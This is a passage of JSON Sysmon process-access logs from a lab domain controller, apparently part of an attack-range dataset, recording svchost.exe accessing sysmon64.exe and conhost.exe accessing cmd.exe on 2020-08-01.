07:55:31.828","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3213,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3214,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3215,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3216,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3217,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3218,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3219,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3220,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.828\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010815A0500}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.828","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010815A0500}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
